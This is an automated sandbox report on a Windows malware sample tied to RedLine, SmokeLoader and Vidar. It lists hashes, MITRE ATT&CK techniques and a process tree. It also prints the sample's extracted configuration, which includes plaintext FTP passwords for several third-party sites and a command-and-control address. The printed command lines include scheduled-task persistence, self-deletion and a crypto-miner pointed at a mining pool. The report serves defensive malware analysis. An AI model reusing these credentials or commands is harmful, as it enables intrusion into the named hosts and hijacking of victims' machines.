redline | 514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420

Analysis

max time kernel
122s
max time network
189s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
30-10-2022 17:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420.exe
Size

286KB
MD5

1fc67595c2e6b55d456b9cd090ece64d
SHA1

d714d38984725324da6f222b09b1c4111656cc6f
SHA256

514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420
SHA512

21a987ea2cfa83a44726e3648b146e0b041b6a25ba4386356cfca614ab7e6af2f1da0b928a94da6dbea6c77188db719142ceb73f06329abb2987726b7fdca876
SSDEEP

3072:cSlKU2WLcay9XLa/5eeRCEeg/lKtTb6I8zxNToycoGMWGVggjcGkNIVqI:YU2WLny9XOXsGlOn6ZjTo9od7ITsq

Score

10^/10

redline smokeloader vidar 1767 google2 backdoor discovery infostealer persistence spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
reanimedia.ru
Port:
21
Username:
[email protected]
Password:
A2307D2012phpv1

Extracted

Credentials

Protocol: ftp
Host:
pasco.nl
Port:
21
Username:
[email protected]
Password:
D040

Extracted

Credentials

Protocol: ftp
Host:
der-beyer-clan.de
Port:
21
Username:
[email protected]
Password:
008292

Extracted

Credentials

Protocol: ftp
Host:
leroyairport.com
Port:
21
Username:
[email protected]
Password:
1028102868123456123!!

Extracted

Credentials

Protocol: ftp
Host:
lineartec.de
Port:
21
Username:
[email protected]
Password:
Juhu4711#

Extracted

Credentials

Protocol: ftp
Host:
der-beyer-clan.de
Port:
21
Username:
marc
Password:
008292

Extracted

Credentials

Protocol: ftp
Host:
lineartec.de
Port:
21
Username:
mlinaric
Password:
Juhu4711#

Extracted

Credentials

Protocol: ftp
Host:
leroyairport.com
Port:
21
Username:
postmaster
Password:
1028102868123456123!!

Extracted

Credentials

Protocol: ftp
Host:
der-beyer-clan.de
Port:
21
Username:
admin
Password:
008292

Extracted

Credentials

Protocol: ftp
Host:
lineartec.de
Port:
21
Username:
admin
Password:
Juhu4711#

Extracted

Credentials

Protocol: ftp
Host:
leroyairport.com
Port:
21
Username:
admin
Password:
1028102868123456123!!

Extracted

Credentials

Protocol: ftp
Host:
reanimedia.ru
Port:
21
Username:
shevchenko
Password:
A2307D2012phpv1

Extracted

Credentials

Protocol: ftp
Host:
reanimedia.ru
Port:
21
Username:
admin
Password:
A2307D2012phpv1

Extracted

Family

redline

Botnet

Google2

167.235.71.14:20469

Attributes

auth_value
fb274d9691235ba015830da570a13578

Extracted

Family

vidar

Version

55.3

Botnet

1767

https://t.me/slivetalks

https://c.im/@xinibin420

Attributes

profile_id
1767

Signatures

Detects Smokeloader packer 1 IoCs

resource	yara_rule
behavioral1/memory/1656-133-0x0000000002CC0000-0x0000000002CC9000-memory.dmp	family_smokeloader

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/memory/3536-143-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral1/memory/5008-148-0x00000000009C0000-0x0000000000A78000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Downloads MZ/PE file

Executes dropped EXE 12 IoCs

pid	Process
1892	68BC.exe
5008	93B5.exe
1068	B2D7.exe
1576	C382.exe
5064	eChAhUSSeAssSUSUfHuUCeAKCsFHHKsHFBAKhAKFsCBFEFKHCHESfBS.exe
3848	D46B.exe
3620	2403.exe
632	2403.exe
2308	LYKAA.exe
2780	rovwer.exe
3628	4085.exe
4848	4B73.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0009000000022e13-158.dat	upx
behavioral1/files/0x0009000000022e13-160.dat	upx
behavioral1/memory/1576-168-0x0000000000DF0000-0x00000000015D9000-memory.dmp	upx
behavioral1/memory/1576-179-0x0000000000DF0000-0x00000000015D9000-memory.dmp	upx
behavioral1/memory/632-183-0x0000000000400000-0x0000000000846000-memory.dmp	upx
behavioral1/memory/632-185-0x0000000000400000-0x0000000000846000-memory.dmp	upx
behavioral1/memory/632-188-0x0000000000400000-0x0000000000846000-memory.dmp	upx
behavioral1/memory/632-189-0x0000000000400000-0x0000000000846000-memory.dmp	upx
behavioral1/memory/632-194-0x0000000000400000-0x0000000000846000-memory.dmp	upx
behavioral1/memory/632-246-0x0000000000400000-0x0000000000846000-memory.dmp	upx

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	B2D7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	D46B.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	LYKAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	rovwer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\""	2403.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\	2403.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 5008 set thread context of 3536	5008	93B5.exe	93
PID 3620 set thread context of 632	3620	2403.exe	107
PID 3628 set thread context of 4716	3628	4085.exe	117
PID 4848 set thread context of 4232	4848	4B73.exe	123

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4348	1892	WerFault.exe	83
3708	3848	WerFault.exe	102
10452	632	WerFault.exe	107

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3976	schtasks.exe
1916	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
3324	timeout.exe
10256	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1656	514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420.exe
1656	514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420.exe
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2556	Process not Found

Suspicious behavior: MapViewOfSection 19 IoCs

pid	Process
1656	514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420.exe
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found

Suspicious use of AdjustPrivilegeToken 63 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeDebugPrivilege	5064	eChAhUSSeAssSUSUfHuUCeAKCsFHHKsHFBAKhAKFsCBFEFKHCHESfBS.exe
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeDebugPrivilege	2308	LYKAA.exe
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeDebugPrivilege	3536	vbc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2556 wrote to memory of 1892	2556	Process not Found	83
PID 2556 wrote to memory of 1892	2556	Process not Found	83
PID 2556 wrote to memory of 1892	2556	Process not Found	83
PID 2556 wrote to memory of 5008	2556	Process not Found	91
PID 2556 wrote to memory of 5008	2556	Process not Found	91
PID 2556 wrote to memory of 5008	2556	Process not Found	91
PID 5008 wrote to memory of 3536	5008	93B5.exe	93
PID 5008 wrote to memory of 3536	5008	93B5.exe	93
PID 5008 wrote to memory of 3536	5008	93B5.exe	93
PID 5008 wrote to memory of 3536	5008	93B5.exe	93
PID 5008 wrote to memory of 3536	5008	93B5.exe	93
PID 2556 wrote to memory of 1068	2556	Process not Found	97
PID 2556 wrote to memory of 1068	2556	Process not Found	97
PID 2556 wrote to memory of 1576	2556	Process not Found	98
PID 2556 wrote to memory of 1576	2556	Process not Found	98
PID 1068 wrote to memory of 5064	1068	B2D7.exe	99
PID 1068 wrote to memory of 5064	1068	B2D7.exe	99
PID 5064 wrote to memory of 3236	5064	eChAhUSSeAssSUSUfHuUCeAKCsFHHKsHFBAKhAKFsCBFEFKHCHESfBS.exe	100
PID 5064 wrote to memory of 3236	5064	eChAhUSSeAssSUSUfHuUCeAKCsFHHKsHFBAKhAKFsCBFEFKHCHESfBS.exe	100
PID 2556 wrote to memory of 3848	2556	Process not Found	102
PID 2556 wrote to memory of 3848	2556	Process not Found	102
PID 2556 wrote to memory of 3848	2556	Process not Found	102
PID 2556 wrote to memory of 3620	2556	Process not Found	103
PID 2556 wrote to memory of 3620	2556	Process not Found	103
PID 2556 wrote to memory of 3620	2556	Process not Found	103
PID 3236 wrote to memory of 3324	3236	cmd.exe	104
PID 3236 wrote to memory of 3324	3236	cmd.exe	104
PID 1576 wrote to memory of 408	1576	C382.exe	105
PID 1576 wrote to memory of 408	1576	C382.exe	105
PID 3620 wrote to memory of 632	3620	2403.exe	107
PID 3620 wrote to memory of 632	3620	2403.exe	107
PID 3620 wrote to memory of 632	3620	2403.exe	107
PID 3620 wrote to memory of 632	3620	2403.exe	107
PID 3620 wrote to memory of 632	3620	2403.exe	107
PID 3620 wrote to memory of 632	3620	2403.exe	107
PID 3620 wrote to memory of 632	3620	2403.exe	107
PID 3620 wrote to memory of 632	3620	2403.exe	107
PID 3236 wrote to memory of 2308	3236	cmd.exe	108
PID 3236 wrote to memory of 2308	3236	cmd.exe	108
PID 2308 wrote to memory of 4132	2308	LYKAA.exe	109
PID 2308 wrote to memory of 4132	2308	LYKAA.exe	109
PID 2556 wrote to memory of 3628	2556	Process not Found	112
PID 2556 wrote to memory of 3628	2556	Process not Found	112
PID 2556 wrote to memory of 3628	2556	Process not Found	112
PID 3848 wrote to memory of 2780	3848	D46B.exe	111
PID 3848 wrote to memory of 2780	3848	D46B.exe	111
PID 3848 wrote to memory of 2780	3848	D46B.exe	111
PID 4132 wrote to memory of 3976	4132	cmd.exe	115
PID 4132 wrote to memory of 3976	4132	cmd.exe	115
PID 3628 wrote to memory of 4716	3628	4085.exe	117
PID 3628 wrote to memory of 4716	3628	4085.exe	117
PID 3628 wrote to memory of 4716	3628	4085.exe	117
PID 3628 wrote to memory of 4716	3628	4085.exe	117
PID 3628 wrote to memory of 4716	3628	4085.exe	117
PID 2556 wrote to memory of 4848	2556	Process not Found	118
PID 2556 wrote to memory of 4848	2556	Process not Found	118
PID 2556 wrote to memory of 4848	2556	Process not Found	118
PID 2780 wrote to memory of 1916	2780	rovwer.exe	121
PID 2780 wrote to memory of 1916	2780	rovwer.exe	121
PID 2780 wrote to memory of 1916	2780	rovwer.exe	121
PID 2556 wrote to memory of 3472	2556	Process not Found	120
PID 2556 wrote to memory of 3472	2556	Process not Found	120
PID 2556 wrote to memory of 3472	2556	Process not Found	120
PID 2556 wrote to memory of 3472	2556	Process not Found	120

C:\Users\Admin\AppData\Local\Temp\514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420.exe
"C:\Users\Admin\AppData\Local\Temp\514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1656

C:\Users\Admin\AppData\Local\Temp\68BC.exe
C:\Users\Admin\AppData\Local\Temp\68BC.exe
1⤵
- Executes dropped EXE
PID:1892
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 244
  2⤵
  - Program crash
  PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1892 -ip 1892
1⤵
PID:1136

C:\Users\Admin\AppData\Local\Temp\93B5.exe
C:\Users\Admin\AppData\Local\Temp\93B5.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5008
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3536

C:\Users\Admin\AppData\Local\Temp\B2D7.exe
C:\Users\Admin\AppData\Local\Temp\B2D7.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1068
- C:\Users\Admin\AppData\Roaming\eChAhUSSeAssSUSUfHuUCeAKCsFHHKsHFBAKhAKFsCBFEFKHCHESfBS.exe
  "C:\Users\Admin\AppData\Roaming\eChAhUSSeAssSUSUfHuUCeAKCsFHHKsHFBAKhAKFsCBFEFKHCHESfBS.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD205.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3236
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3324
  - - C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
      "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2308
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4132
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:3976
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs002 -p hybrid -t 5
        5⤵
        
        PID:7088
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:7356

C:\Users\Admin\AppData\Local\Temp\C382.exe
C:\Users\Admin\AppData\Local\Temp\C382.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1576
- C:\Windows\system32\cmd.exe
  cmd.exe /c "del C:\Users\Admin\AppData\Local\Temp\C382.exe"
  2⤵
  PID:408

C:\Users\Admin\AppData\Local\Temp\D46B.exe
C:\Users\Admin\AppData\Local\Temp\D46B.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3848
- C:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exe
  "C:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:1916
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 880
  2⤵
  - Program crash
  PID:3708

C:\Users\Admin\AppData\Local\Temp\2403.exe
C:\Users\Admin\AppData\Local\Temp\2403.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3620
- C:\Users\Admin\AppData\Local\Temp\2403.exe
  C:\Users\Admin\AppData\Local\Temp\2403.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:632
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 632 -s 34452
    3⤵
    - Program crash
    PID:10452

C:\Users\Admin\AppData\Local\Temp\4085.exe
C:\Users\Admin\AppData\Local\Temp\4085.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3628
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" & exit
    3⤵
    PID:7448
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:10256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3848 -ip 3848
1⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\4B73.exe
C:\Users\Admin\AppData\Local\Temp\4B73.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4848
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:4232

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3472

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3216

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1848

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3900

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4952

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3984

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3364

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:760

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3752

C:\Users\Admin\AppData\Roaming\aegiair
C:\Users\Admin\AppData\Roaming\aegiair
1⤵
PID:10980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 632 -ip 632
1⤵
PID:5696

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Network Service Scanning

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe

Filesize
837KB

MD5
e620507c28834b337195ca9d35c4a79b

SHA1
5b80356e3066da91a8193493c9fbfc37e259c226

SHA256
703e1fb4de14b29eca7245d72f7ccf27e1cebb068f6381dc28c64661a4b5058b

SHA512
123b25991a0951cdbd5a9e912db373c6924f465f3332d73c0a7ca0e3520aca84a6eefc1e2b0696f2e326f177a166c3c1a7e25fc8c2594fac5ac1961af58bb2a5

Download Submit
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe

Filesize
837KB

MD5
e620507c28834b337195ca9d35c4a79b

SHA1
5b80356e3066da91a8193493c9fbfc37e259c226

SHA256
703e1fb4de14b29eca7245d72f7ccf27e1cebb068f6381dc28c64661a4b5058b

SHA512
123b25991a0951cdbd5a9e912db373c6924f465f3332d73c0a7ca0e3520aca84a6eefc1e2b0696f2e326f177a166c3c1a7e25fc8c2594fac5ac1961af58bb2a5

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\ProgramData\sqlite3.dll

Filesize
1.1MB

MD5
1f44d4d3087c2b202cf9c90ee9d04b0f

SHA1
106a3ebc9e39ab6ddb3ff987efb6527c956f192d

SHA256
4841020c8bd06b08fde6e44cbe2e2ab33439e1c8368e936ec5b00dc0584f7260

SHA512
b614c72a3c1ce681ebffa628e29aa50275cc80ca9267380960c5198ea4d0a3f2df6cfb7275491d220bad72f14fc94e6656501e9a061d102fb11e00cfda2beb45

Download Submit
C:\Users\Admin\AppData\LocalLow\mozglue.dll

Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
C:\Users\Admin\AppData\LocalLow\nss3.dll

Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
C:\Users\Admin\AppData\LocalLow\sqlite3.dll

Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2403.exe

Filesize
1.9MB

MD5
1ab692faa421b9fa9819e9dbfd863a8e

SHA1
b43b5dffc44489f4110391854f4c28e8f3031f2c

SHA256
cfdb339b4d7125188320d70f5d005a46caa2a2f29fb70ecde4eb5f9187704b1e

SHA512
511c9dade0883aaaf50989f187131812049d264b2bbec109b79c5058fe12c3b0cb5def6f89b1fe7bb58e3835416432decad8427e1e83b0b8c50a057e4a363060

Download Submit
C:\Users\Admin\AppData\Local\Temp\2403.exe

Filesize
1.9MB

MD5
1ab692faa421b9fa9819e9dbfd863a8e

SHA1
b43b5dffc44489f4110391854f4c28e8f3031f2c

SHA256
